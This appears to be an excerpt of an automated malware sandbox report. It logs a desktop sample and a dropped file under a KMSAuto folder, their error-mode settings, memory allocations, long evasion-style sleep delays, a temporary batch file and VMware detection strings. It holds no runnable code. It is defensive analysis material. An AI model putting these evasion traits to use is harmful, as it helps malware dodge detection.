            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\KMSAuto\accc.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe; Memory allocated: 1430000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe; Memory allocated: 31E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe; Memory allocated: 51E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe; Memory allocated: 14A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe; Memory allocated: 2FB0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe; Memory allocated: 2DD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe; Memory allocated: 6210000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe; Memory allocated: F210000 memory reserve | memory write watch
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 2440000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 4440000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 5580000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 4A20000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 4990000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 5A10000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 4F00000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 18D0000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 33D0000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 19D0000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 3220000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\KMSAuto\accc.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe TID: 7780 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe TID: 7352 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\timeout.exe TID: 6264 Thread sleep count: 46 > 30
            Source: C:\ProgramData\KMSAuto\accc.exe TID: 4772 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe File Volume queried: C:\ FullSizeInformation (2 occurrences)
            Source: C:\ProgramData\KMSAuto\accc.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\KMSAuto\accc.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
            Source: Amcache.hve.4.dr Binary or memory string: VMware
            Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
            Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
            Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
